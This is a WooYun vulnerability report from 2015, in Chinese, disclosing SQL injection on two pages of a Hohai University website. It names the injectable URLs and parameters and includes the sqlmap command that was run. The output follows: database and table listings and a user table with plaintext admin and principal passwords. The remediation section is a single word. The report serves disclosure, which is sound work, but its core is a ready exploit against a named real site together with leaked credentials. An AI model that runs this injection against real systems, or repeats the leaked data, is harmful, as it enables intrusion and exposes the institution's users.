当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109083

漏洞标题:河海大学注入一枚

相关厂商:河海大学

漏洞作者: 路人甲

提交时间:2015-04-24 12:47

修复时间:2015-04-29 12:48

公开时间:2015-04-29 12:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-24: 细节已通知厂商并且等待厂商处理中
2015-04-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

我查了一下,,咱乌云上就一个,,还是老和尚提666的其中一个,,,,,,注射点不一样,,能通过吗? 应该是没做完防护,,,

详细说明:

注入点:第一出: http://sljzw.hhu.edu.cn/fen/cata.aspx?type=75
第二处:http://sljzw.hhu.edu.cn/fen/showmore.aspx?newstype=2
C:\Users\Administrator>sqlmap.py -u http://sljzw.hhu.edu.cn/fen/cata.aspx?type
=75 --dbs
available databases [24]:
[*] ChengGuo
[*] HH_Course
[*] HH_Course_2010
[*] HH_lw
[*] HH_StarOfWater
[*] HH_Teachers
[*] HHDX_DiaoCha
[*] HHDX_DiaoCha_OLD
[*] innovation
[*] lunwen
[*] lunwenII
[*] lunwenIIold
[*] lwtest
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] shuili
[*] suili
[*] tempdb
[*] TeSeZhuanYe
[*] TMJSFG
[*] XFRD
Database: HH_Course
[12 tables]
+----------------+
| T_Answer |
| T_News |
| T_Question |
| T_Type |
| T_User |
| T_XueYuan |
| T_ZhuanYe |
| V_Answer |
| V_Question |
| dtproperties |
| sysconstraints |
| syssegments |
+----------------+
Database: HH_Course
Table: T_User
[3 entries]
+--------+----+-----+-----------+----------+-----------------------+------------
------+
| UserId | No | Pwd | Role | UserName | UserFile | FileTheme
|
+--------+----+-----+-----------+----------+-----------------------+------------
------+
| Admin | 1 | 1 | Admin | ??攷?晤??塔 | ImagesData/Admin/2170 | ImagesDa
ta/Admin |
| 11 | 2 | 11 | Principal | 11 | NULL | NULL
|
| 22 | 3 | 22 | Principal | 22 | NULL | NULL
|
+--------+----+-----+-----------+----------+-----------------------+------------
Database: HH_Teachers
[48 tables]
+---------------------------+
| T_Answer |
| T_BMXiangMu |
| T_BaoMing |
| T_CiShu |
| T_DDPJ |
| T_Email |
| T_GQSJ |
| T_HDBM |
| T_JXLiNian |
| T_JXZiLiao |
| T_News |
| T_Question |
| T_SelTeachingConsultation |
| T_SelXiangMu |
| T_StudentPJ |
| T_TCType |
| T_THPJ |
| T_TeachingConsultation |
| T_Type |
| T_User |
| T_XMBM |
| T_XueYuan |
| T_ZHKaoHe |
| T_ZhuanYe |
| T_ZhuanYes |
| V_001 |
| V_Answer |
| V_JLHD |
| V_Question |
| V_TeachingConsultation |
| dtproperties |
| sysconstraints |
| syssegments |
| t_DAnswer |
| t_DOption |
| t_DiaoCha |
| t_DiaoChaTM |
| t_Dtimu |
| t_HDAnswer |
| t_HDQuestion |
| t_JSKHJG |
| t_JSPingJia |
| t_JXHuoDong |
| t_JsTypeQiShu |
| t_QiShu |
| t_TeacherInfo |
| t_XueQi |
| t_keCheng |
+---------------------------+

漏洞证明:

rs

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-29 12:48

厂商回复:

最新状态:

暂无